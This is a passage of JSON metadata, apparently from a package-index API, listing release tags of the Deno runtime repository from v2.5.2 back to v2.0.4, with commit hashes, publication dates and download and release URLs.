-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":